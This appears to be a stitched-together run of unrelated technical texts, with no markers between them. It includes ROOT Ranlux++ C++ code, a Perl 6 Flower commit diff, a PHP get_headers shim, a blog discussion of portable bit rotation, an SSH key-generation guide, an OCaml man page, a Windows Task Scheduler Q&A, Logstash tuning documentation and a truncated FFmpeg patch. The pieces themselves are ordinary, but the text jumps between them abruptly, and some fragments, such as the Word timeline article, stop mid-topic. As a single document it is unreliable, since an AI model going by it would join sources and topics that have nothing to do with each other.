   void SetSeed(uint32_t s, bool ranlxd)
   {
      uint32_t bits = s;
      auto next_bit = [&]() {
         int b13 = (bits >> 18) & 0x1;
         int b31 = bits & 0x1;
         uint32_t bn = b13 ^ b31;
         bits = (bn << 30) + (bits >> 1);
         return b31;
      };
      auto next = [&]() {
         uint64_t ix = 0;
         for (int l = 0; l < 24; l++) {
            ix = 2 * ix + next_bit();
         }
         return ix;
      };

      for (int i = 0; i < 4; i++) {
         auto &state = fStates[i];
         for (int j = 0; j < 9; j += 3) {
            uint64_t r[8];
            for (int m = 0; m < 8; m++) {
               uint64_t ix = next();
               // Lüscher's implementation uses k = (j / 3) * 8 + m, so only
               // the value of m is important for (k % 4).
               if ((!ranlxd && (m % 4) == i) || (ranlxd && (m % 4) != i)) {
                  ix = 16777215 - ix;
               }
               r[m] = ix;
            }

            state.fState[j+0] = r[0] + (r[1] << 24) + (r[2] << 48);
            state.fState[j+1] = (r[2] >> 16) + (r[3] << 8) + (r[4] << 32) + (r[5] << 56);
            state.fState[j+2] = (r[5] >> 8) + (r[6] << 16) + (r[7] << 40);
         }

         state.fCarry = 0;
         state.fPosition = 0;
         state.Advance();
      }

      fNextState = 0;
   }

   /// Skip `n` random numbers without generating them
   void Skip(uint64_t n)
   {
      uint64_t nPerState = n / 4;
      int remainder = n % 4;
      for (int i = 0; i < 4; i++) {
         int idx = (fNextState + i) % 4;
         uint64_t nForThisState = nPerState;
         if (i < remainder) {
            nForThisState++;
         }
         fStates[idx].Skip(nForThisState);
      }
      // Switch the next state according to the remainder.
      fNextState = (fNextState + remainder) % 4;
   }
};

template <int p>
RanluxppCompatEngineLuescherRanlxs<p>::RanluxppCompatEngineLuescherRanlxs(uint64_t seed)
   : fImpl(new RanluxppCompatEngineLuescherImpl<24, p>)
{
   this->SetSeed(seed);
}

template <int p>
RanluxppCompatEngineLuescherRanlxs<p>::~RanluxppCompatEngineLuescherRanlxs() = default;

template <int p>
double RanluxppCompatEngineLuescherRanlxs<p>::Rndm()
{
   return (*this)();
}

template <int p>
double RanluxppCompatEngineLuescherRanlxs<p>::operator()()
{
   return fImpl->NextRandomFloat();
}

template <int p>
uint64_t RanluxppCompatEngineLuescherRanlxs<p>::IntRndm()
{
   return fImpl->NextRandomBits();
}

template <int p>
void RanluxppCompatEngineLuescherRanlxs<p>::SetSeed(uint64_t seed)
{
   fImpl->SetSeed(seed, /*ranlxd=*/false);
}

template <int p>
void RanluxppCompatEngineLuescherRanlxs<p>::Skip(uint64_t n)
{
   fImpl->Skip(n);
}

template class RanluxppCompatEngineLuescherRanlxs<218>;
template class RanluxppCompatEngineLuescherRanlxs<404>;
template class RanluxppCompatEngineLuescherRanlxs<794>;


template <int p>
RanluxppCompatEngineLuescherRanlxd<p>::RanluxppCompatEngineLuescherRanlxd(uint64_t seed)
   : fImpl(new RanluxppCompatEngineLuescherImpl<48, p>)
{
   this->SetSeed(seed);
}

template <int p>
RanluxppCompatEngineLuescherRanlxd<p>::~RanluxppCompatEngineLuescherRanlxd() = default;

template <int p>
double RanluxppCompatEngineLuescherRanlxd<p>::Rndm()
{
   return (*this)();
}

template <int p>
double RanluxppCompatEngineLuescherRanlxd<p>::operator()()
{
   return fImpl->NextRandomFloat();
}

template <int p>
uint64_t RanluxppCompatEngineLuescherRanlxd<p>::IntRndm()
{
   return fImpl->NextRandomBits();
}

template <int p>
void RanluxppCompatEngineLuescherRanlxd<p>::SetSeed(uint64_t seed)
{
   fImpl->SetSeed(seed, /*ranlxd=*/true);
}

template <int p>
void RanluxppCompatEngineLuescherRanlxd<p>::Skip(uint64_t n)
{
   fImpl->Skip(n);
}

template class RanluxppCompatEngineLuescherRanlxd<404>;
template class RanluxppCompatEngineLuescherRanlxd<794>;


RanluxppCompatEngineStdRanlux24::RanluxppCompatEngineStdRanlux24(uint64_t seed)
   : fImpl(new RanluxppEngineImpl<24, 223, 23>)
{
   this->SetSeed(seed);
}

RanluxppCompatEngineStdRanlux24::~RanluxppCompatEngineStdRanlux24() = default;

double RanluxppCompatEngineStdRanlux24::Rndm()
{
   return (*this)();
}

double RanluxppCompatEngineStdRanlux24::operator()()
{
   return fImpl->NextRandomFloat();
}

uint64_t RanluxppCompatEngineStdRanlux24::IntRndm()
{
   return fImpl->NextRandomBits();
}

void RanluxppCompatEngineStdRanlux24::SetSeed(uint64_t seed)
{
   fImpl->SetSeedStd24(seed);
}

void RanluxppCompatEngineStdRanlux24::Skip(uint64_t n)
{
   fImpl->Skip(n);
}


RanluxppCompatEngineStdRanlux48::RanluxppCompatEngineStdRanlux48(uint64_t seed)
   : fImpl(new RanluxppEngineImpl<48, 778, 11>)
{
   this->SetSeed(seed);
}

RanluxppCompatEngineStdRanlux48::~RanluxppCompatEngineStdRanlux48() = default;

double RanluxppCompatEngineStdRanlux48::Rndm()
{
   return (*this)();
}

double RanluxppCompatEngineStdRanlux48::operator()()
{
   return fImpl->NextRandomFloat();
}

uint64_t RanluxppCompatEngineStdRanlux48::IntRndm()
{
   return fImpl->NextRandomBits();
}

void RanluxppCompatEngineStdRanlux48::SetSeed(uint64_t seed)
{
   fImpl->SetSeedStd48(seed);
}

void RanluxppCompatEngineStdRanlux48::Skip(uint64_t n)
{
   fImpl->Skip(n);
}

} // end namespace Math
} // end namespace ROOT
Changed how 'default' works, and root tag processed too.
* My original method of 'default' was lame and totally broken.
The new version actually works properly.
* Due to changes above, there's also a new array called @.elements, of which
the first item is always the element currently being processed.
* Prior to this release, the root tag of the document was not processed
for TAL attributes. Now it is. May not be common, but useful nonetheless.
* Oh, and re-organized the tests yet again. Now they are grouped into
categories, each category starting with a certain number.
1 parent 6da6654 commit 60a74e51d305335f970f5352a4b630bf82e89802 @supernovus committed Oct 9, 2010
@@ -27,6 +27,10 @@ has %!modifiers;
## Data, is used to store the replacement data. Is available for modifiers.
has %.data is rw;
+## Default stores the elements in order of parsing.
+## Used to get the 'default' value, and other such stuff.
+has @.elements;
+
## Internal class, used for the 'repeat' object.
class Flower::Repeat {
has $.index;
@@ -116,7 +120,7 @@ method parse (*%data) {
}
## Okay, now let's parse the elements.
- self!parse-elements($.template.root);
+ self!parse-element($.template.root);
return ~$.template;
}
@@ -133,8 +137,9 @@ method !parse-elements ($xml is rw) {
if $i == $xml.nodes.elems { last; }
my $element = $xml.nodes[$i];
if $element !~~ Exemel::Element { next; } # skip non-elements.
- %.data<default> = $element.nodes; # the 'default' keyword.
+ @.elements.unshift: $element; ## Stuff the newest element into place.
self!parse-element($element);
+ @.elements.shift; ## and remove it again.
## Now we clean up removed elements, and insert replacements.
if ! defined $element {
$xml.nodes.splice($i--, 1);
@@ -195,10 +200,13 @@ method !parse-condition ($xml is rw, $tag) {
}
method !parse-content ($xml is rw, $tag) {
- $xml.nodes.splice;
my $node = self.query($xml.attribs{$tag}, :forcexml);
if defined $node {
- $xml.nodes.push: $node;
+ if $node === $xml.nodes {} # special case for 'default'.
+ else {
+ $xml.nodes.splice;
+ $xml.nodes.push: $node;
+ }
}
$xml.unset: $tag;
}
@@ -275,6 +283,10 @@ method query ($query is copy, :$noxml, :$forcexml, :$bool, :$noescape is copy) {
if ($bool) { return False; }
else { return ''; }
}
+ if $query eq 'default' {
+ my $default = @.elements[0].nodes;
+ return $default;
+ }
if $query ~~ /^ structure \s+ / {
$query.=subst(/^ structure \s+ /, '');
$noescape = True;
@@ -0,0 +1,26 @@
+#!/usr/bin/env perl6
+
+BEGIN { @*INC.unshift: './lib' }
+
+use Test;
+use Flower;
+
+plan 2;
+
+my $xml = '<?xml version="1.0"?>';
+
+## test 1
+
+my $template = '<test><i tal:content="default">The default text</i></test>';
+my $flower = Flower.new(:template($template));
+
+is $flower.parse(), $xml~'<test><i>The default text</i></test>', 'tal:content with default';
+
+## test 2
+
+$template = '<test><i tal:replace="default">The default text</i></test>';
+$flower.=another(:template($template));
+
+is $flower.parse(), $xml~'<test>The default text</test>', 'tal:replace with default';
+
+
Location: PHPKode > projects > Php4dvd - movie database > php4dvd/lib/db/Compat/Function/get_headers.php
<?php
// +----------------------------------------------------------------------+
// | PHP Version 4 |
// +----------------------------------------------------------------------+
// | Copyright (c) 1997-2004 The PHP Group |
// +----------------------------------------------------------------------+
// | This source file is subject to version 3.0 of the PHP license, |
// | that is bundled with this package in the file LICENSE, and is |
// | available at through the world-wide-web at |
// | http://www.php.net/license/3_0.txt. |
// | If you did not receive a copy of the PHP license and are unable to |
// | obtain it through the world-wide-web, please send a note to |
// | [email protected] so we can mail you a copy immediately. |
// +----------------------------------------------------------------------+
// | Authors: Aidan Lister <[email protected]> |
// +----------------------------------------------------------------------+
//
// $Id: get_headers.php,v 1.1 2005/05/10 07:50:53 aidan Exp $
/**
* Replace get_headers()
*
* @category PHP
* @package PHP_Compat
* @link http://php.net/function.get_headers
* @author Aeontech <[email protected]>
* @author Cpurruc <[email protected]>
* @author Aidan Lister <[email protected]>
* @version $Revision: 1.1 $
* @since PHP 5.0.0
* @require PHP 4.0.0 (user_error)
*/
if (!function_exists('get_headers')) {
    function get_headers($url, $format = 0)
    {
        // Init
        $headers = array();
        $urlinfo = parse_url($url);
        $port    = isset($urlinfo['port']) ? $urlinfo['port'] : 80;

        // Connect
        $fp = fsockopen($urlinfo['host'], $port, $errno, $errstr, 30);
        if ($fp === false) {
            return false;
        }

        // Send request
        $head = 'HEAD ' . $urlinfo['path'] .
                (isset($urlinfo['query']) ? '?' . $urlinfo['query'] : '') .
                ' HTTP/1.0' . "\r\n" .
                'Host: ' . $urlinfo['host'] . "\r\n\r\n";
        fputs($fp, $head);

        // Read the response headers
        while (!feof($fp)) {
            if ($header = trim(fgets($fp, 1024))) {
                list($key) = explode(':', $header);

                if ($format === 1) {
                    // First element is the HTTP status line, such as "HTTP/1.1 200 OK".
                    // It doesn't have a separate name, so check for it
                    if ($key == $header) {
                        $headers[] = $header;
                    } else {
                        $headers[$key] = substr($header, strlen($key) + 2);
                    }
                } else {
                    $headers[] = $header;
                }
            }
        }
        fclose($fp);

        return $headers;
    }
}
?>
Safe, Efficient, and Portable Rotate in C/C++
Rotating a computer integer is just like shifting, except that when a bit falls off one end of the register, it is used to fill the vacated bit position at the other end. Rotate is used in encryption and decryption, so we want it to be fast. The obvious C/C++ code for left rotate is:
uint32_t rotl32a (uint32_t x, uint32_t n)
{
return (x<<n) | (x>>(32-n));
}
Modern compilers will recognize this code and emit a rotate instruction, if available:
rotl32a:
movb %sil, %cl
roll %cl, %edi
movl %edi, %eax
ret
The source and assembly code for right rotate are analogous.
Although this x86-64 rotate instruction will have the expected behavior (acting as a nop) when asked to rotate by 0 or 32 places, this C/C++ function must only be called with n in the range 1-31. Outside of that range, the code has undefined behavior due to shifting a 32-bit value by 32 places. In general, crypto codes are designed to avoid rotating 32-bit words by 32 places. However, as seen in my last post, the current versions of five of the 10 open source crypto libraries that I examined perform rotations by 0 places — a potentially serious bug because C/C++ compilers have unpredictable results when shifting past bitwidth. Bear in mind that the well-definedness of the eventual instruction does not rescue the situation: it is the source code that places (or in this case, fails to place) obligations upon the compiler.
Here’s a safer rotate function:
uint32_t rotl32b (uint32_t x, uint32_t n)
{
assert (n<32);
if (!n) return x;
return (x<<n) | (x>>(32-n));
}
This one protects against the expected case where n is zero by avoiding the erroneous shift and also against the disallowed case of rotating by too many places. If we don’t want the overhead of the assert for production compiles, we can define NDEBUG in the preprocessor. The problem with this code is that (even with the assert compiled out) it contains a branch, which is sort of ugly. Clang generates the obvious branching code whereas GCC chooses to use a conditional move:
rotl32b:
movl %edi, %eax
movb %sil, %cl
roll %cl, %eax
testl %esi, %esi
cmove %edi, %eax
ret
I figured that was the end of the story but then I saw this version:
uint32_t rotl32c (uint32_t x, uint32_t n)
{
assert (n<32);
return (x<<n) | (x>>(-n&31));
}
This one is branchless, meaning that it results in a single basic block of code, potentially making it easier to optimize. At the moment it defeats Clang’s rotate recognizer:
rotl32c:
movl %esi, %ecx
movl %edi, %eax
shll %cl, %eax
negl %ecx
shrl %cl, %edi
orl %eax, %edi
movl %edi, %eax
ret
However, they are working on this.
GCC (built today) has the desired output:
rotl32c:
movl %edi, %eax
movb %sil, %cl
roll %cl, %eax
ret
Here is their discussion of that issue.
Summary: If you want to write portable C/C++ code (that is, you don’t want to use intrinsics or inline assembly) and you want to correctly deal with rotating by zero places, the rotl32c() function from this post, and its obvious right-rotate counterpart, are probably the best choices. GCC already generates excellent code and the LLVM people are working on it.
28 replies on “Safe, Efficient, and Portable Rotate in C/C++”
1. bcs, this one (let’s call it rotl32d) may be the new winner. gcc gives the same code as rotl32c, clang gives better code than rotl32c, and IMO it’s clearer than rotl32c.
2. Can I just say this situation is crazy? You have a simple, common programming task. In order to implement it in C, you have to write some unreadable bit-masking code. This code is not designed to be executed as such, but only be recognized as rotate by the compiler.
3. Hi David, I certainly see your point of view, and agree that the rules in C/C++ are heavily biased towards making the compiler’s job easier, as opposed to the programmer’s, but I might phrase it a bit differently.
How about this: The code is designed to unambiguously express the rotate function in the context of the somewhat arcane restrictions imposed by C/C++. Furthermore, it has the purpose of being recognizably a rotate that can be exploited by the compiler to generate an appropriate instruction should it be available (and certainly it will not be on some platforms).
So the purpose is not only to be recognized as a rotate. In that case, we have better ways to say the same thing, e.g. __builtin_rotate(x,n). The difference is that the code in this post gives the compiler enough information to implement a correct rotate in all circumstances, including those where it has an instruction and those where it doesn’t.
I don’t mean to be a C/C++ apologist, I hate all this stuff. But even so, I think it’s valuable to document the current best practice (as I understand it). If 5 out of 10 crypto library authors are doing it wrong, then clearly there’s a need for this information to be put out there.
4. John — I didn’t mean to downplay the importance of this blog post. I have certainly needed to write high-performance rotate code in C, and I definitely wish I had seen this posting when I struggled to do it the right way. I am angry that there is not a simple, direct way to express this instead of having to go through this complicated charade.
5. Rotation constants in cryptographic code are in an overwhelming amount of cases known at compile time (RC6 is one of the few exceptions). This allows us to resolve this at compile time with either macros (C), or templates (C++). C++11 example:
template <unsigned c>
using rot_t = std::integral_constant<unsigned, c>;

template <unsigned c>
uint32_t rol(uint32_t x, rot_t<c>)
{
    return (x << c) | (x >> ((32-c)&31));
}
// x = rol(x, rot_t<13>());
This way, the backend will be able to properly optimize the rotation. And since the type of the constant is distinct of plain uint32_t, this can be used side-by-side with a non-compile-time function that does the proper checks.
6. The (-n&31) trick to eliminate the branch is neat, but doesn’t C++ still permit one’s complement representation for signed integers, in which case it gets the wrong answer (e.g., for n=1 we get (-n&31) == 30)?
7. Good timing for this post and the last one, as I just reviewed a patch adding centralized rotation methods to Mozilla’s code (to cut down on duplicates overall) last week, with the shift-by-0 error in them, then stumbled across these posts only a day or two later. 🙂
It looks like all Mozilla’s rotation uses rotate by constants. So there’s no issue with existing code in these ways, just a lurking one for future uses. (Does non-constant rotation have use cases? None spring immediately to mind.) I too agree with David that it’s kind of sad C/C++ make it so difficult to do this.
Note that negating an unsigned type triggers compiler warnings with some compilers (MSVC particularly), because negating a non-negative number and getting back a non-negative number is a bit confusing. (Notwithstanding that it’s well-defined in C/C++. But only sometimes — thanks, integral promotion!) So even if every compiler optimized rotl32c properly, I still probably wouldn’t use it.
8. regehr: uint32_t is unsigned so it can’t represent negative values and therefore isn’t two’s complement on any architecture. My thought was that taking the negative of it would undergo integral conversion to a signed value. I think 0-n would do that, but I see that unary negative applied to an unsigned integral value (in C++11 at least) does produce an unsigned integral value (defined to be 2^b - n when b is the number of bits in the promoted type of n).
So this trick should work on a one’s complement system (in at least C++11, and assuming integral promotion doesn’t somehow enter undefined behavior space).
9. You can avoid UB rotating a little each time:
unsigned int rol_ub(unsigned int value, unsigned int amount)
{
assert(amount > 0);
assert(amount < 32);
return (value << amount) | (value >> (32 - amount));
}
unsigned int rol_step(unsigned int value, unsigned int amount)
{
unsigned result = value;
result = rol_ub(result, 1 + amount/2);
result = rol_ub(result, 1 + (amount - amount/2));
result = rol_ub(result, 30);
return result;
}
Neither clang nor gcc fuse the rotations, though.
10. The language used in the standard says unsigned integral types behave as the integers modulo 2^n. This is equivalent to 2’s complement.
11. pabigot: 0-n works just as well as -n: the 0 is promoted to the same unsigned type as n and then the subtraction is done using the rules for unsigned types, which are that the result has one less than the maximum number representable in that type added or subtracted until the result is in range.
(This is as long as the type of n is at least as wide as ‘unsigned int’ – if it’s narrower, it may be promoted to signed int, but that problem also exists for the -n variant).
12. “The language used in the standard says unsigned integral types behave as the integers modulo 2^n. This is equivalent to 2’s complement.”
Yes, ISO/IEC 14882:2011 section 3.9.1 graf 4 specifies that unsigned integer types obey the laws of arithmetic modulo 2^N (first sentence above). Inferring from this any operational relationship to 2’s complement (second sentence above) is, I believe, a mistake. I suppose you could say that it’s equivalent to [arithmetic in] two’s complement as long as the resulting value remains within the non-negative portion of the two’s complement value range, but that’s not a useful generalization.
It is still permissible for implementations to use other representations for signed integer types (3.9.1 graf 7), and there are still situations where an unsigned operand is converted to a signed type. For example, had the code been (0-n)&0x1F I believe the wrong answer would be obtained on implementations that (a) had sizeof(int)>sizeof(uint32_t) (5 graf 10) and (b) used one’s complement representation for signed integral values. The fact that n happened to be an unsigned integral type is irrelevant because it would have been promoted to a signed value.
My error was in assuming -n was the same as 0-n, which involves arithmetic conversion and thus may produce a negative signed value. For unsigned integral types the expression -n (see 5.3.1 graf 8) is not the same as the expression 0-n (see 5.7 et alia). The code of rotl32c never introduces signed values so the question of signed representation is moot, and I’m sorry my confusion suggested the issue arose.
13. pabigot: The unary – operator performs the integer promotions on its operand. As you note, if int can represent all the values of uint32_t, the integer promotions will promote n to int.
In this situation though (where ‘int’ is wider than 32 bits), the left shift is also problematic because of the promotion of x! A fully portable version must convert the uint32_t x value to unsigned long before shifting (in fact the n function argument could/should simply be unsigned int).
14. kme: Yes, I hadn’t thought that all the way through. 4.5 graf 1 and 2 makes clear that “small” unsigned types will be promoted to signed int, potentially opening up a big can of mess.
However, I’m not entirely convinced for the case of -n versus 0-n because 5.3.1 graf 8 specifies the calculation for negative of an “unsigned quantity” to be subtraction from 2^n which will produce a positive value, unlike subtraction from 0 which produces a non-positive value. Does the fact the promoted type is signed override the fact that the operand is known to be an “unsigned quantity”? If not, the negation and subsequent bitmask still produces the right value regardless of representation of negative integral values.
(I also agree that the type of n would better have been unsigned int to begin with.)
That the value-to-be-rotated might become signed as a result of integral promotion is a different question that I hadn’t considered, and I agree (per 5.8 graf 2) that this means a left shift that overflows evokes undefined behavior. Though I believe a cast of x to unsigned int would be sufficient in the case in question (where the rank of uint32_t is less than the rank of int); no need to go all the way to unsigned long.
Fortunately C++11 has the expressive power to ensure the operation is always well-defined, through static_assert so the implementation of the function can verify at compile-time the conditions required, or std::enable_if or material in <type_traits> to specialize an alternative implementation that does any necessary casts.
15. > Furthermore, it has the purpose of being recognizably a rotate that can be exploited by the compiler to generate an appropriate instruction should it be available (and certainly it will not be on some platforms).
There are certainly platforms without rotate instructions, and C is useful on those platforms. OK, but can those platforms really run C++?
I really doubt it!
So while C’s behaviour is understandable, C++ should provide a rotate operation.
16. Why should C++ provide a rotate operation when it’s so easy to do it yourself?
Potential irony aside, https://gist.github.com/pabigot/7550454 eliminates all sources of undefined behavior that I’ve identified, and will produce a compile-time error if the algorithm’s preconditions are not met. It also generates similarly optimal code under current gcc (-std=c++11 -O3) as is produced for rotl32c. I like C++11.
I believe comments on the approach can be made on the gist page if anybody finds a mistake.
17. I suggest casting x to unsigned long because that type must be at least 32 bits wide, whereas unsigned int need not be.
How to make a creative TIMELINE in Word in a few steps (example) - See how it's done
In Word we can create countless text documents for daily use with a professional finish; for example, how to write a recommendation letter step by step in Word, books and more. In just a few steps we will teach you the technique for creating a creative timeline in Word with a professional result. You can't miss it!
How to create a creative TIMELINE in Word in a few steps
In the style of PowerPoint, Word allows us to create text documents with several pages that, once finished, we can convert into an editable PDF file. This way our work stays professional and editable, so we can modify the text and images or add more content to it.
How to generate SSH Keys in Linux?
Are you trying to generate ssh keys under Linux / UNIX operating systems for remote login?
This guide is for you.
An SSH key is an access credential in the SSH protocol. Its function is similar to that of user names and passwords.
Here at LinuxReels, as part of our Server Management Services, we regularly help our customers perform software installation tasks on their Linux servers.
In this context, we shall look into steps to create ssh keys as follows on any Linux or UNIX-like operating systems.
How to generate SSH Keys in Linux?
In Linux, you can use the ssh-keygen command to Generate SSH Keys.
Basically, the ssh-keygen command generates, manages and converts authentication keys for ssh client and server usage.
In order to generate ssh keys, simply log into your Server with an SSH tool such as putty as the root user and execute the command below;
$ ssh-keygen
This will generate SSH keys which will be stored in the "~/.ssh/" directory.
The ssh keys contains the following files;
~/.ssh/id_rsa – Your private key. Do not share this file with anyone. Keep it private.
~/.ssh/id_rsa.pub – Your public key.
Please note that the passphrase must be different from your current password, and do not share keys or passphrases with anyone. Also, make sure you have correct and secure permissions on the ~/.ssh/ directory:
ls -ld ~/.ssh/
chmod 0700 ~/.ssh/
What to do after generating an SSH Keys?
You need to copy the ~/.ssh/id_rsa.pub file to the remote server so that you can log in using keys instead of the password.
Use the following command to copy key to remote server called "server1.LinuxReels.com" for root user:
ssh-copy-id [email protected]
Then, to login simply enter:
ssh [email protected]
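The generation step can be tried end to end without touching `~/.ssh` (a sketch; the temporary path, the `-N ""` empty passphrase, and the 2048-bit RSA choice are illustrative assumptions, not recommendations):

```shell
# Create a throwaway key pair non-interactively in a scratch directory.
tmpdir=$(mktemp -d)
ssh-keygen -t rsa -b 2048 -N "" -f "$tmpdir/id_rsa" -q
ls -l "$tmpdir/id_rsa" "$tmpdir/id_rsa.pub"   # private and public key
rm -rf "$tmpdir"
```

In real use you would drop `-f` and `-N ""` so the key lands in ~/.ssh/ with a passphrase you type at the prompt.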
RANDOM.STATE(3O) - Linux man page online | Library functions
Random.State(3o)                    OCamldoc                   Random.State(3o)

NAME
       Random.State - no description

Module Random.State

       Module State : sig end

       type t
              The type of PRNG states.

       val make : int array -> t
              Create a new state and initialize it with the given seed.

       val make_self_init : unit -> t
              Create a new state and initialize it with a system-dependent
              low-entropy seed.

       val copy : t -> t
              Return a copy of the given state.

       val bits : t -> int
       val int : t -> int -> int
       val int32 : t -> Int32.t -> Int32.t
       val nativeint : t -> Nativeint.t -> Nativeint.t
       val int64 : t -> Int64.t -> Int64.t
       val float : t -> float -> float
       val bool : t -> bool
              These functions are the same as the basic functions, except
              that they use (and update) the given PRNG state instead of the
              default one.

2017-10-20                                                     Random.State(3o)
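A small usage sketch (not part of the man page): an explicit state keeps draws reproducible and independent of the global generator, and a copied state replays the same stream.

```ocaml
let () =
  let st  = Random.State.make [| 42 |] in
  let st2 = Random.State.copy st in        (* snapshot before drawing *)
  let a = Random.State.int st 100 in
  let b = Random.State.int st2 100 in
  assert (a = b);                          (* the copy replays the stream *)
  print_endline "ok"
```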
I have a backup / autoupdate process for my software, and usually I create a new user to run it in Task Scheduler (most users don't have a password, and Task Scheduler requires one; I don't know why).
Then I've seen that Google Chrome installs its auto-update task to run as "NT AUTHORITY\SYSTEM". I've tested it and it works great with my programs too, and it looks cleaner.
Are there any hidden drawbacks here that I'm not seeing?
Thanks!
My recommendation
For a single machine, the most straight forward method is to create an account under the Builtin Backup Operators group.
There are two large drawbacks that initially come to mind when running programs under SYSTEM.
Security
Almost always the biggest reason admins create discreet accounts for scheduled processes is to monitor them and grant them access one would normally not grant to a typical running application. In this case, it needs read access to all files and needs write access to your backup storage location, the later tending to have more strict access.
Giving a program the SYSTEM account amounts to running it as an admin, more or less, thus granting it more privileges than it needs. There is a built-in Backup Operators group for this reason.
UAC
The SYSTEM account is sometimes mistaken by users for a SuperUser or root account. It is neither. It is used internally by Windows. It was never intended to be used by programs unless the program specifies it. That said, unknown bugs creep up when running a program not designed for the SYSTEM account. For one, notice there is no user password for it. Nor is it actually a user account if you try to authenticate to it remotely.
Anecdotally, UAC also plays havoc with programs that run under the SYSTEM context. I've seen badly written programs straight up throw a dialog asking the user to "run as Admin." Go figure.
Also, there is an MSDN blog post that comes to mind that I cannot find: the author spent a whole day debugging SQL Server on a client's machine. Fresh install . . . or so they thought. Turns out, a certain component of the OS itself was switched from NT AUTHORITY\NETWORK SERVICE to SYSTEM, under the guise that it had more permissions and privileges than any other account. Rather, it just has different ones.
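For illustration, both approaches from the question can be written with the built-in `schtasks` tool (a sketch; the task name, program path, account name, and password are hypothetical placeholders):

```
:: Run as SYSTEM: no password needed, but broad privileges.
schtasks /Create /TN "MyBackup" /TR "C:\bin\backup.exe" /SC DAILY /ST 02:00 /RU SYSTEM

:: Run as a dedicated least-privilege account (e.g. in Backup Operators): password required.
schtasks /Create /TN "MyBackup" /TR "C:\bin\backup.exe" /SC DAILY /ST 02:00 /RU MYPC\backupsvc /RP S3cretPw
```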
Tuning and Profiling Logstash Performance
The Logstash defaults are chosen to provide fast, safe performance for most users. However if you notice performance issues, you may need to modify some of the defaults. Logstash provides the following configurable options for tuning pipeline performance: pipeline.workers, pipeline.batch.size, and pipeline.batch.delay. For more information about setting these options, see logstash.yml.
Make sure you’ve read the Performance Troubleshooting Guide before modifying these options.
• The pipeline.workers setting determines how many threads to run for filter and output processing. If you find that events are backing up, or that the CPU is not saturated, consider increasing the value of this parameter to make better use of available processing power. Good results can even be found increasing this number past the number of available processors as these threads may spend significant time in an I/O wait state when writing to external systems. Legal values for this parameter are positive integers.
• The pipeline.batch.size setting defines the maximum number of events an individual worker thread collects before attempting to execute filters and outputs. Larger batch sizes are generally more efficient, but increase memory overhead. Some hardware configurations require you to increase JVM heap space in the jvm.options config file to avoid performance degradation. (See Logstash Configuration Files for more info.) Values in excess of the optimum range cause performance degradation due to frequent garbage collection or JVM crashes related to out-of-memory exceptions. Output plugins can process each batch as a logical unit. The Elasticsearch output, for example, issues bulk requests for each batch received. Tuning the pipeline.batch.size setting adjusts the size of bulk requests sent to Elasticsearch.
• The pipeline.batch.delay setting rarely needs to be tuned. This setting adjusts the latency of the Logstash pipeline. Pipeline batch delay is the maximum amount of time in milliseconds that Logstash waits for new messages after receiving an event in the current pipeline worker thread. After this time elapses, Logstash begins to execute filters and outputs.The maximum time that Logstash waits between receiving an event and processing that event in a filter is the product of the pipeline.batch.delay and pipeline.batch.size settings.
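For reference, the three settings above live in logstash.yml; a minimal sketch (the values are illustrative, not recommendations):

```yaml
# logstash.yml -- illustrative values only
pipeline.workers: 8        # threads running the filter + output stages
pipeline.batch.size: 250   # events a worker collects before flushing
pipeline.batch.delay: 50   # ms to wait for more events before flushing
```

With these values the inflight count would be 8 * 250 = 2000 events, which is the figure to keep in mind when sizing the JVM heap.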
Notes on Pipeline Configuration and Performance
If you plan to modify the default pipeline settings, take into account the following suggestions:
• The total number of inflight events is determined by the product of the pipeline.workers and pipeline.batch.size settings. This product is referred to as the inflight count. Keep the value of the inflight count in mind as you adjust the pipeline.workers and pipeline.batch.size settings. Pipelines that intermittently receive large events at irregular intervals require sufficient memory to handle these spikes. Set the JVM heap space accordingly in the jvm.options config file. (See Logstash Configuration Files for more info.)
• Measure each change to make sure it increases, rather than decreases, performance.
• Ensure that you leave enough memory available to cope with a sudden increase in event size. For example, an application that generates exceptions that are represented as large blobs of text.
• The number of workers may be set higher than the number of CPU cores since outputs often spend idle time in I/O wait conditions.
• Threads in Java have names and you can use the jstack, top, and the VisualVM graphical tools to figure out which resources a given thread uses.
• On Linux platforms, Logstash labels all the threads it can with something descriptive. For example, inputs show up as [base]<inputname, and pipeline workers show up as [base]>workerN, where N is an integer. Where possible, other threads are also labeled to help you identify their purpose.
Profiling the Heap
When tuning Logstash you may have to adjust the heap size. You can use the VisualVM tool to profile the heap. The Monitor pane in particular is useful for checking whether your heap allocation is sufficient for the current workload. The screenshots below show sample Monitor panes. The first pane examines a Logstash instance configured with too many inflight events. The second pane examines a Logstash instance configured with an appropriate amount of inflight events. Note that the specific batch sizes used here are most likely not applicable to your specific workload, as the memory demands of Logstash vary in large part based on the type of messages you are sending.
[Screenshot: Monitor pane of an overloaded pipeline]
[Screenshot: Monitor pane of a correctly loaded pipeline]
In the first example we see that the CPU isn’t being used very efficiently. In fact, the JVM is often times having to stop the VM for “full GCs”. Full garbage collections are a common symptom of excessive memory pressure. This is visible in the spiky pattern on the CPU chart. In the more efficiently configured example, the GC graph pattern is more smooth, and the CPU is used in a more uniform manner. You can also see that there is ample headroom between the allocated heap size, and the maximum allowed, giving the JVM GC a lot of room to work with.
Examining the in-depth GC statistics with a tool similar to the excellent VisualGC plugin shows that the over-allocated VM spends very little time in the efficient Eden GC, compared to the time spent in the more resource-intensive Old Gen “Full” GCs.
As long as the GC pattern is acceptable, heap sizes that occasionally increase to the maximum are acceptable. Such heap size spikes happen in response to a burst of large events passing through the pipeline. In general practice, maintain a gap between the used amount of heap memory and the maximum. This document is not a comprehensive guide to JVM GC tuning. Read the official Oracle guide for more information on the topic. We also recommend reading Debugging Java Performance.
From patchwork Wed Apr 21 12:27:04 2021
X-Patchwork-Submitter: Nicolas George
X-Patchwork-Id: 27198
From: Nicolas George
To: [email protected]
Date: Wed, 21 Apr 2021 14:27:04 +0200
Message-Id: <[email protected]>
In-Reply-To: <[email protected]>
References: <[email protected]>
Subject: [FFmpeg-devel] [PATCH 5/7] WIP: add an intro to AVWriter

Signed-off-by: Nicolas George
---
 avwriter_intro.txt | 261
+++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 261 insertions(+)
 create mode 100644 avwriter_intro.txt

diff --git a/avwriter_intro.txt b/avwriter_intro.txt
new file mode 100644
index 0000000000..b1b54711c9
--- /dev/null
+++ b/avwriter_intro.txt
@@ -0,0 +1,261 @@
+XXX make error return more strict
+XXX? make buf size return more foolproof
+
+
+# An introduction to the AVWriter API.
+
+Do not look at the length headers. Do not look at the convoluted API. Just
+imagine these few use cases.
+
+
+## Scenario 1: You need to call a function that takes an AVWriter.
+
+What are AVWriter anyway? They are for when a function returns a string.
+For example, take the very common:
+
